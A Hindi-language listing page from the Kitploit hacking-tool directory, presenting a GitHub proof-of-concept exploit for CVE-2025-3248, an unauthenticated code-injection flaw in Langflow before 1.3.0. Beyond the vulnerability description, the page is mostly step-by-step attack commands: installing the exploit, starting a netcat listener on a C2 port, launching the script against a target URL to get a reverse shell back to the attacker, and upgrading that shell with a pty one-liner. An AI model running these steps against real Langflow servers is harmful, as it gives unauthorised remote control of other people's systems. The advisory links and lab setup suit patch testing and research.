Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-3248 — Langflow संस्करण <1.3.0 में RCE प्राप्त करने के लिए PoC | Kitploit
उपकरण/GitHubGitHub/wand3rlust/cve-2025-3248
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलपेलोड डेवलपमेंट
GitHubwand3rlust/cve-2025-3248

CVE-2025-3248

Langflow संस्करण <1.3.0 में RCE प्राप्त करने के लिए PoC

रिपॉजिटरी देखें
7 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-3248

परिचय

1.3.0 से पहले के Langflow संस्करण /api/v1/validate/code एंडपॉइंट में Python exec() फ़ंक्शन के माध्यम से बिना प्रमाणीकरण के कोड इंजेक्शन के प्रति संवेदनशील हैं। यह एक्सप्लॉइट इस कमज़ोरी का दुरुपयोग करके एक रिवर्स शेल कनेक्शन स्थापित करता है।

उपयोग

कॉन्फ़िगरेशन

root@kitploit:~
git clone https://github.com/wand3rlust/CVE-2025-3248.git
cd CVE-2025-3248/
python3 -m venv venv
. venv/bin/activate
pip install -r requirements.txt

कमज़ोर ऐप

root@kitploit:~
docker pull langflowai/langflow:1.1.4
docker run -p 7860:7860 langflowai/langflow:1.1.4

चलाएँ

root@kitploit:~
# Terminal 1
nc -nvlp <C2_PORT>

# Terminal 2
python3 cve-2025-3248.py <TARGET_URL> <C2_IP> <C2_PORT>

उदाहरण: python3 cve-2025-3248.py http://10.10.10.1:7860 10.0.13.37 1337

नोट: शेल को TTY में अपग्रेड करने के लिए, शेल मिलने के बाद नीचे दिया गया कमांड चलाएँ।

python -c 'import pty; pty.spawn("/bin/bash")'

डेमो

Demo

संदर्भ

  • परामर्श: https://nvd.nist.gov/vuln/detail/CVE-2025-3248
  • GitHub: https://github.com/langflow-ai/langflow/security/advisories/GHSA-rvqx-wpfh-mfx7
  • मूल एक्सप्लॉइट: https://www.exploit-db.com/exploits/52262
टूल डाउनलोड करें